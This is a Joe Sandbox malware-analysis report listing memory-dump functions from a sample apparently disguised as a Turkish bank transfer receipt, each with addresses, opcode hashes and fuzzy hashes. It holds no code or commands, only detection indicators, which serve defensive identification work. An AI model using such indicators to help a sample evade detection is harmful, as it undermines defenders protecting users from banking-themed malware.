Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab3212caada36c300bc9cb0ff5d2b227f23386eb7849b831d9cf89796ac9499
Instruction ID: 2ebe0dbf85bac956c038cd038563ed5605f9a8046dbc073391a92017f3803733
Opcode Fuzzy Hash: 1ab3212caada36c300bc9cb0ff5d2b227f23386eb7849b831d9cf89796ac9499
Instruction Fuzzy Hash: D2D15E35B04215CFEB48DF68D884A6EBBB3EF88314B158869E5068B3D5CB70DD42DB90

Function 06F06668 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e6eb51a660cb3c29c7eef99492925d1fa5a58e7df1f06f2aeeaae2361b2db6
Instruction ID: 6ed5c7cce73dc36503d69d91950226eece5fab9a48197f84e9125ad5f0f4cc4f
Opcode Fuzzy Hash: 52e6eb51a660cb3c29c7eef99492925d1fa5a58e7df1f06f2aeeaae2361b2db6
Instruction Fuzzy Hash: F8B13A34B006048FDB54DF39D884A6ABBF2FF89700B2544A9E446DB3A2DB30ED45CB61

Function 06F0E388 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049e01653363ba0fa26105b99ca0c7efa01ac82441a6076effc7db8fdccd7b9d
Instruction ID: 996214592ff48bd1818772fe338daa92c89e399b88200ae6f36273f2667d73b1
Opcode Fuzzy Hash: 049e01653363ba0fa26105b99ca0c7efa01ac82441a6076effc7db8fdccd7b9d
Instruction Fuzzy Hash: 80A17D34F102058FEB54DFA4D954A6EBBB2FF88700B148529D906AB3A4DF30ED02DB90

Function 06F06410 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a59f4d3aba1a419fd0e2adca9d233b7de3689d5970fb3a37128f423baecd05a8
Instruction ID: 4daa4b0c2306b7031a749fa5c1546e4de5234bcd901651de084df3569a3e2887
Opcode Fuzzy Hash: a59f4d3aba1a419fd0e2adca9d233b7de3689d5970fb3a37128f423baecd05a8
Instruction Fuzzy Hash: 6A71A434B11210CFE754AB39D858A2A7BEAEF8961571540AAE506CF3F2CF71DC41DB90

Function 06FB0BCD Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7472145b1fbe649dfa5a364626dab1726cc4f2f029eabc4a1876b885cc5f15
Instruction ID: d991c0cc1c974b47e21b18f2d66bdcd4356c46be17d36c00ae765e4281cba96b
Opcode Fuzzy Hash: 3f7472145b1fbe649dfa5a364626dab1726cc4f2f029eabc4a1876b885cc5f15
Instruction Fuzzy Hash: CD71A031A02205AFDB55DFB5DC40AEFBBB7EF89210B14946AE44697691CF30A845CFA0

Function 06FB4988 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18c963876e7d16427d0cb497df1f8313c78d725fb5fb477688c1d6f9eb3d38a
Instruction ID: 637c31deefedf4abd0e3db7f1602b92f0cab2b6d6c9000f6a0792fe1390991a1
Opcode Fuzzy Hash: f18c963876e7d16427d0cb497df1f8313c78d725fb5fb477688c1d6f9eb3d38a
Instruction Fuzzy Hash: FC916775A01201DFDB85DF29D5849AABBF2FF48321B15D496E91ACB366C731EC81CB80

Function 06F06EC0 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a161be9e0a7b9745db50c8e30e64501f1a55a024aeafeec86b801e47da54adc6
Instruction ID: 1007837d7cb960da6d646ba2f5ed3d12dd92235077927882aece88c4828fd36c
Opcode Fuzzy Hash: a161be9e0a7b9745db50c8e30e64501f1a55a024aeafeec86b801e47da54adc6
Instruction Fuzzy Hash: 1B817F35F042158FDB54EF68C8849AEBBF6EF88310B1545AAE515DB3A1D731ED01CBA0

Function 06F01188 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7a893aa4d63a3969dfe263c124ccf647f5870bab4a61fbb55e4c1bb1c218d08
Instruction ID: 7c87638adbce7aa8720994e5acb60601ad1294d9c785faaa121472630dd21c65
Opcode Fuzzy Hash: c7a893aa4d63a3969dfe263c124ccf647f5870bab4a61fbb55e4c1bb1c218d08
Instruction Fuzzy Hash: 8071E432A103909FF741EBA0E4164AD77A2FFC5340745CA66D503AF3A6DE70AE0487E6

Function 06F01198 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55fc01dded098167915eb92929c29f6e15acc3b91205de1134fa80d258b6857e
Instruction ID: d7022131eb7c117128676f8ea6bcf844e6ff06281d0f9c0c0646f77f393fff0f
Opcode Fuzzy Hash: 55fc01dded098167915eb92929c29f6e15acc3b91205de1134fa80d258b6857e
Instruction Fuzzy Hash: 2C71D332A103909FF741EBA0E4164AD77A2FFC5340745CA6AD503AF3A5DE70AE0497E6

Function 06F4DA37 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2cd813cb8696c57ca4e517398e958b11e89a0efc57eaf686844a8e9f8f0562e
Instruction ID: 818fcfe4d4b8f6ced6db5f1a673b672d65c2c7aeb9b774f6d1dfbdc674a6674e
Opcode Fuzzy Hash: d2cd813cb8696c57ca4e517398e958b11e89a0efc57eaf686844a8e9f8f0562e
Instruction Fuzzy Hash: B0716831A05255CFDB659F24D848BAA7BF2EF89305F1484A9E9068B7A1CB31DC81CF91

Function 06FB4FD0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896bc931b255b68751ef95c2928cd5b3474ba2878699bcaa4e5fac12bb80a160
Instruction ID: 8b9437d6edba679db01fef236662b6e30fd7a42a491565f0c928d5704109f8d6
Opcode Fuzzy Hash: 896bc931b255b68751ef95c2928cd5b3474ba2878699bcaa4e5fac12bb80a160
Instruction Fuzzy Hash: EB617B34B002058FDB54EF69D854AAEBBF6EF89310F149469E506EB3A1DB35DC41CBA0

Function 06F05D09 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c28933502afd172bc2a4ac7dba40e81d09bf413b2d258803d17dee11300fbac
Instruction ID: c940a0eb23bb675a9cca17c982a0991e4d3a4976a75e5667e811f6e661c7db2b
Opcode Fuzzy Hash: 6c28933502afd172bc2a4ac7dba40e81d09bf413b2d258803d17dee11300fbac
Instruction Fuzzy Hash: 36615F30F116158FEB54DF69C5846AEB7F6AF88600B148169D506EB394EF70DC42DFA0

Function 06FBBCB0 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce3cd38827b21ba4326b797fe6c993389773d802f5c0dfbbd9256ba4ad546de
Instruction ID: c552a8b888d5dcdf4a489e59d10dd72cb2921057dc1be959c46115fc4834b71b
Opcode Fuzzy Hash: 8ce3cd38827b21ba4326b797fe6c993389773d802f5c0dfbbd9256ba4ad546de
Instruction Fuzzy Hash: 4A617C35E01218DFEB44CFAAD884AFDB7B2FB45300F0091A6F556AB292CB74D841CB51

Function 06FB0C40 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8af3e947e00e3a8005f8fc15d3387594324a3847611df6290bab5593480e529
Instruction ID: da6a77a805add79a6c0f62e38fa7591746d7061f468b91ed4264f1e933828193
Opcode Fuzzy Hash: a8af3e947e00e3a8005f8fc15d3387594324a3847611df6290bab5593480e529
Instruction Fuzzy Hash: EB614871E013099FDB94DFA9D840AAEBBB3FF89310F148469E516A7391DB31AC41CB90

Function 06F0D4E0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f9486ba820e1f5dd9a4a4d3690e1c6df0c0f26016f3cbdec512a60e7ad30fa
Instruction ID: 5386dff0d4fa1b90774341b442b87dcb112e4b69f21f476b7b6bbfa7e217dfa1
Opcode Fuzzy Hash: 35f9486ba820e1f5dd9a4a4d3690e1c6df0c0f26016f3cbdec512a60e7ad30fa
Instruction Fuzzy Hash: EE51B375F14306CFFBA48BE9845067BB7A6EF86208F144929D907CB2C5EA30D881E7D1

Function 06F00FE0 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab06a6cfe682538f267fcb67c4c664295751452bdb48d9500c3465a2f7c6d6d5
Instruction ID: 82957bc6137f712569231a1db97136c8d7e06f9861592f3b7522fc7a1275793e
Opcode Fuzzy Hash: ab06a6cfe682538f267fcb67c4c664295751452bdb48d9500c3465a2f7c6d6d5
Instruction Fuzzy Hash: C4512432F057108FD725DB68D880A5BBBEAEFC5720719896ED489DB781DA31EC01C790

Function 06F0BD30 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 319123c18c220210b2f5f4a2c1955f4a9b9029eeecdbea8cc79a9c5326b6d37c
Instruction ID: e114662a1c8e7cd2241a74dfed2931f544c6aa266c34ff55b3bf1ab53e57b7f5
Opcode Fuzzy Hash: 319123c18c220210b2f5f4a2c1955f4a9b9029eeecdbea8cc79a9c5326b6d37c
Instruction Fuzzy Hash: AF519D30B103159FDB54EFA8E884A9EB7F2EF88300B108529E506AB390DF75ED01DB90

Function 06FBBCA1 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c824bd70071c60dbfb32bc6044bd1b999598851503983ce15fdde88179d1c23
Instruction ID: 562ba0d777d9b25500840d31aab5703ab96b93c7c9eafe9621bcf4cb2be6e65f
Opcode Fuzzy Hash: 3c824bd70071c60dbfb32bc6044bd1b999598851503983ce15fdde88179d1c23
Instruction Fuzzy Hash: 2A51AB75E00215DFEB40CFAAD885AFDB7B2FF44300F0091A6F916AB292DB749951CB91

Function 06F07DB0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9214af56cc734647aef8479e9a89238d8a34a538bcfd2bd69acbf3e99d09de8b
Instruction ID: bf19ada9acc0c64855a5db4e4b45e70babf18b6ce40bca6d3ac8f7ac7676ef2e
Opcode Fuzzy Hash: 9214af56cc734647aef8479e9a89238d8a34a538bcfd2bd69acbf3e99d09de8b
Instruction Fuzzy Hash: CF51C435B012048FDB54EF78D84099EBBF6EF88210B1584AAE505DB362DB31ED45CBA0

Function 06FB4E20 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56346a29903422b17e33639f3a281753da148340dde4282c185204468d5eff2
Instruction ID: 6587105c343df868ab8c0233b30151fa5c7d20cdbaa6f2e5d00e18b073df61d1
Opcode Fuzzy Hash: b56346a29903422b17e33639f3a281753da148340dde4282c185204468d5eff2
Instruction Fuzzy Hash: C851A031E042559FDB51CF69C980AAABBF2FF85320F158555F465DB2AAC730E940CB60

Function 06FB4830 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203ee33dd3c0bc1a7921c2b8c2b013388822716c7cb65af50b74398baeba4e4e
Instruction ID: 9a0f4190dbc3c596ffe225b6d5050e1c46a7ec3b9eea5757e675b5218b20a685
Opcode Fuzzy Hash: 203ee33dd3c0bc1a7921c2b8c2b013388822716c7cb65af50b74398baeba4e4e
Instruction Fuzzy Hash: EC41B336A052599FDB11CF55EC408EFBFFAEF88221B148026F915D3251C731D965DBA0

Function 06F0EF28 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5086587214fd34d8e19a527b84b1a2455ffb03ba2bededebd73bc00636940a51
Instruction ID: 9154aedc57f8dd3fe1fa2b6e831e4ec6fe02c1404abeeca1c90ba93046f5b8e6
Opcode Fuzzy Hash: 5086587214fd34d8e19a527b84b1a2455ffb03ba2bededebd73bc00636940a51
Instruction Fuzzy Hash: 09416731B047058FEB60DB69E94096BBBBAFFC431170588A6E804CB391DB30EC02D7A0

Function 06F0F180 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063265fbc6fed6abcde66f2f66629e3f7f105848ffc7c9ec07d90d627dd7de6f
Instruction ID: aba669ee1d33f3fc119d92b3111cc68a3766d8ed189369f78e7f3a41e60e6c39
Opcode Fuzzy Hash: 063265fbc6fed6abcde66f2f66629e3f7f105848ffc7c9ec07d90d627dd7de6f
Instruction Fuzzy Hash: DE41C374B01615CFEB64DF69D94496ABBF5EF89310B1580A9ED09CB3A2DB30EC41CB60

Function 06F0CE98 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956952ab3dae94cf9df857619f0248f20a88e0477985b0aabb193a7acbd97975
Instruction ID: c9e326d72a13a4dfc7fa46b41c4fba1e80f12ff6e489ae7f0ee31c3dd7d5cccf
Opcode Fuzzy Hash: 956952ab3dae94cf9df857619f0248f20a88e0477985b0aabb193a7acbd97975
Instruction Fuzzy Hash: 6A418A75A053049FD754EF68D8808AABBF6FF89350B108969E909CB391DB31ED40CBA0

Function 06F06F80 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d435ae1e234f1e88047ebd29e97aa9996a0a63c97c85b1717d381072f8d3325
Instruction ID: c296be865dcb7df0054688bb3c00aef7978384adfe09b599f44eced6c3e0437d
Opcode Fuzzy Hash: 1d435ae1e234f1e88047ebd29e97aa9996a0a63c97c85b1717d381072f8d3325
Instruction Fuzzy Hash: 79417E35B14105CFEB54EF28C44496ABBF5EF8835071581AAE805DB3A2DB31ED41DBA0

Function 06F08071 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4965bc546fb05326316388c9fabc3e086aa3d57c31e6632fae795fe20e0af61d
Instruction ID: 2de44c12d2dd95cc075e8c76aa6895589be0d1bfd6e4ca9c3b4d6c3e8e28eb34
Opcode Fuzzy Hash: 4965bc546fb05326316388c9fabc3e086aa3d57c31e6632fae795fe20e0af61d
Instruction Fuzzy Hash: D731D23470E3848FCB06DB78D8548AA7FB6AF8624031A40EAE451CB2E3CA34DD55D7A1

Function 06FBB8FC Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1beb99d9587c6cac06fb7ef5a2b0035b9428aa490a598973e231cbaec8e41230
Instruction ID: 61624be1b89c3b15f1da86b159a895fba291cfc82f9ac6b36e4b3144bec3b878
Opcode Fuzzy Hash: 1beb99d9587c6cac06fb7ef5a2b0035b9428aa490a598973e231cbaec8e41230
Instruction Fuzzy Hash: C9313771904309AFDF50DFAAD844ADEBFF9EB49310F14846AE519A7310D775A940CFA0

Function 06FB90AE Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70b82a8ee208f44144df27b072ac84669b070ac4d97d6d04511aaadbedcc5dff
Instruction ID: 1434d25ceb26e41a3c7599317a8bb0839855449c620dbf209681ba860993b727
Opcode Fuzzy Hash: 70b82a8ee208f44144df27b072ac84669b070ac4d97d6d04511aaadbedcc5dff
Instruction Fuzzy Hash: C431CB31A1A3A08FE7025B75985D26A7FB5EF4722170886E7E942CB2D2DE748C80C771

Function 06F07338 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3425fd6171c345451184b56efbd4d3c2d45d4d29a238d28110555b49bb3382
Instruction ID: 310963b35c99864033ebb9a5ccb30d85b4795b2dd74a0b72f6baedbbf8cb0676
Opcode Fuzzy Hash: 9b3425fd6171c345451184b56efbd4d3c2d45d4d29a238d28110555b49bb3382
Instruction Fuzzy Hash: 32316D35B017019FEB56DF35D88496E7BB2FF89200B1480A9E906CB395DB31ED11CB91

Function 06F0AE9A Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27743bfd9664f09f882f7e9c6a8349277a4d166fdde968257a38fc93f96b7ee7
Instruction ID: 1d3c8aa53c167175836c909cbd6ab2323697aaac911dd541792ae01c85a81b9c
Opcode Fuzzy Hash: 27743bfd9664f09f882f7e9c6a8349277a4d166fdde968257a38fc93f96b7ee7
Instruction Fuzzy Hash: F8317A71B112059FEB05DFA4C844ABEBBB7AF88310F15815AF505DB2A1CB31CD41DBA1

Function 06F07348 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7324358f4ac13519b0de600f63b7d0f75b100ea083a330734fe7fb955523018
Instruction ID: 3c014ab9195bae39598920319a9c69649f2bd0d3bfda887e0bb811cf878d5f17
Opcode Fuzzy Hash: a7324358f4ac13519b0de600f63b7d0f75b100ea083a330734fe7fb955523018
Instruction Fuzzy Hash: 00315D35B013159FDB55DF39D8849AEBBB6FF89200B108069E906CB395DB31ED11CB91

Function 06FBAEC0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9386066856d5e21dcc36fed176ec2f9f15349057772d0fc3022ac53c0598255e
Instruction ID: 19738aa3a7ba8909cad48a28c5033f905f2ca49632fba8b56999df5472c41193
Opcode Fuzzy Hash: 9386066856d5e21dcc36fed176ec2f9f15349057772d0fc3022ac53c0598255e
Instruction Fuzzy Hash: 46313971F05204DFD7409B6AD8047FA77B6EBC5300F14916AD515CB392EB76C841CBA1

Function 06FB8111 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7410778ff01062360b6a5bf26c84cfc9a95a295eb0e3d716510aba51f961fb7b
Instruction ID: c81dadc190a672623b8bd86201fc8c0970b8ff1d6f9e820ef67bda9970701e55
Opcode Fuzzy Hash: 7410778ff01062360b6a5bf26c84cfc9a95a295eb0e3d716510aba51f961fb7b
Instruction Fuzzy Hash: BD41F434E01218DFDB05DFA5D844ADEBBB2FF89300F14806AE415AB360DB359955DF90

Function 06F0D708 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d740056d73dc77486bd422a5693193178fa3eea21ab7b0ed8eb2f86750cf933
Instruction ID: a507db9cbafce4a2021442a2088c5966c150934c196a1d81d8e9bc6b2b9025c2
Opcode Fuzzy Hash: 2d740056d73dc77486bd422a5693193178fa3eea21ab7b0ed8eb2f86750cf933
Instruction Fuzzy Hash: BA318F79B013059FEB549FB4984872EBBA6BF89611B24453CE902DB391DF31CC45CBA0

Function 06FB8120 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bdf7b933a319ff8c8d01c7123e14820cc7234f24e8debbc2b6eeff1c25ab919
Instruction ID: b21cbc7c6af96a07e2a74fd31149b07f508734bf2ed65097150c3f9cb6dcfbff
Opcode Fuzzy Hash: 2bdf7b933a319ff8c8d01c7123e14820cc7234f24e8debbc2b6eeff1c25ab919
